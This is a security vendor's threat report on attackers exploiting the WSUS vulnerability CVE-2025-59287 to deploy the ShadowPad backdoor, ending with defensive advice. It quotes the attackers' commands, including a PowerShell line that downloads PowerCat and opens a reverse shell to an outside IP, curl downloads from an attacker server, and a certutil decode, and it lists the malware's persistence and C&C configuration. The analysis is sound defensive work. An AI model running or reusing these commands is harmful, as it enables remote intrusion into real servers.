1. Overview

AhnLab SEcurity intelligence Center (ASEC) has identified an attack where the remote code execution vulnerability in Microsoft Windows Server Update Services (WSUS), tracked as CVE-2025-59287, was exploited to distribute the ShadowPad malware. ShadowPad is a backdoor malware used by numerous Chinese APT groups. First discovered in 2017, its developers have continuously updated its modules. According to a report by SentinelOne, ShadowPad is privately sold to Chinese state-backed APT groups. This report analyzes the initial intrusion process exploiting the vulnerability, the operational mechanism of ShadowPad, and recommended countermeasures.

 

The attacker targeted Windows Servers with WSUS enabled, exploiting CVE-2025-59287 for initial access. They then used PowerCat, an open-source PowerShell-based Netcat utility  (https://github.com/besimorhino/powercat), to obtain a system shell (CMD). Subsequently, they downloaded and installed ShadowPad using certutil and curl.

 

2. Initial Access (CVE-2025-59287) and Foothold Establishment (PowerCat)

On October 14th, Microsoft published a security advisory for a vulnerability in Microsoft Windows Server Update Services (WSUS). This vulnerability exists in servers with the WSUS service activated in a Windows Server environment, and it is a critical vulnerability that allows remote code execution with system privileges. Following the public release of the PoC code on October 22nd, the AhnLab Smart Defense (ASD) infrastructure recorded a history of PowerCat being executed against a Windows Server system where the vulnerability is presumed to exist. Through this, it is believed that the threat actor has gained access to the CMD shell of the target system.

 

Figure 1. Logs of PowerShell execution (PowerCat) using CVE-2025-59287

 

The identified PowerShell commands are as follows:

• powershell.exe -c IEX (New-Object System.Net.WebClient).DownloadString (‘https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1’); powercat -c 154.17.26[.]41 -p 8080 -e cmd

 

3. Installing Malware

After gaining initial access, the threat actor exploited the same vulnerability on November 6th to execute curl.exe and certutil.exe, which are legitimate Windows utilities, to install the ShadowPad malware.

Figure 2. Installation log of ShadowPad via CVE-2025-59287

The command used for installation are as follows:

• curl hxxp://149.28.78[.]189:42306/tmp.txt -o C:\users\%ASD%\tmp.txt & curl hxxp://149.28.78[.]189:42306/dll.txt -o C:\users\%ASD%\dll.txt & curl hxxp://149.28.78[.]189:42306/exe.txt -o C:\users\%ASD%\exe.txt
• certutil -decode C:\users\%ASD%\tmp.txt C:\programdata\0C137A80.tmp

 

4. ShadowPad

ShadowPad rarely operates as a standalone executable. Instead, it relies on DLL sideloading. In the latest case, ShadowPad is executed through an EXE and DLL file pair that share the same names as those seen in previous ShadowPad attack cases.

Sideloaded DLL Name	DLL MD5	Legitimate EXE Name	EXE MD5	TMP File Name	TMP File MD5
ETDApix.dll	27e00b5594530e8c5e004098eef2ec50	ETDCtrlHelper.exe	564e7d39a9b6da3cf0da3373351ac717	0C137A80.tmp	85b935e80e84dd47e0fa5e1dfb2c16f4

Table 1: ShadowPad DLL sideloading details

 

When the legitimate executable (ETDCtrlHelper.exe) runs, the malicious DLL (ETDApix.dll) acts as the ShadowPad loader, operating entirely in memory. The .tmp file located in the same directory contains the core ShadowPad functionality, including its backdoor configuration data. The Table 2 includes the key configuration details observed in this attack.

 

Config Item	Value
Mutex	Q-X64
Service Name	Q-X64
Service Display Name	Q-X64 Service
Service Description	Q-X64 Service for windows
Persistence Registry Key	SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Persistence Registry Value	Q-X64
Persistence Name	Q-X64
Task Scheduler Path	Microsoft\Windows\UPnP
Task Scheduler Name	Microsoft Corporation
Task Scheduler Description	Q-X64 Service for windows
Startup Process Path #1	%ProgramFiles%\Q-X64\Q-X64.exe
Startup Process Path #1	%APPDATA%\Q-X64\Q-X64.exe
Startup Process Path #3	%LOCALAPPDATA%\Q-X64\Q-X64.exe
Startup Process Path #4	%TEMP%\Q-X64\Q-X64.exe
Sideloading DLL Name	ETDApix.dll
Injection Target Process Path #1	“%PROGRAMFILES%\Windows Mail\WinMail.exe” Q-X64
Injection Target Process Path #2	“%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe” Q-X64
Injection Target Process Path #3	“%ProgramFiles%\Windows Media Player\wmplayer.exe” Q-X64
Injection Target Process Path #4	“%SystemRoot%\system32\svchost.exe” Q-X64
C&C #1	HTTP://163.61.102[.]245:443
C&C #2	HTTPS://163.61.102[.]245:443
Proxy IP #1	N/A
Proxy IP #2	N/A
Proxy IP #3	N/A
Proxy IP #4	N/A
C&C Header #1	POST
C&C Header #2	65536
C&C Header #3	User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
C&C Header #4	Accept-Language: en-ca,en;q=0.8,en-us;q=0.6,de-de;q=0.4,de;q=0.2
C&C Header #5	Accept-Encoding: gzip, deflate
C&C Header #6	Accept: text/html, application/xhtml+xml, image/jxr, */*
C&C Header #7	N/A
Forward TCP IP	Registry Required
Forward UDP IP	Registry Required
Files Registered for Persistence	N/A

Table 2. ShadowPad Config information

 

5. Conclusion

After the proof-of-concept (PoC) exploit code for the vulnerability was publicly released, attackers quickly weaponized it to distribute ShadowPad malware via WSUS servers. This vulnerability is critical because it allows remote code execution with system-level permission, significantly increasing the potential impact. To mitigate the risk, security managers in organizations using WSUS should immediately implement the following measures:

1. Apply Microsoft’s latest security update addressing CVE-2025-59287
2. Review WSUS server exposure and access controls: 

• Ensure only Microsoft Update servers can access WSUS.
• Consider blocking inbound traffic on TCP ports 8530 and 8531 for all other sources.

  3. Audit for suspicious activity, including:

• execution history of PowerShell, certutil.exe, and curl.exe
• network connection logs for anomalous patterns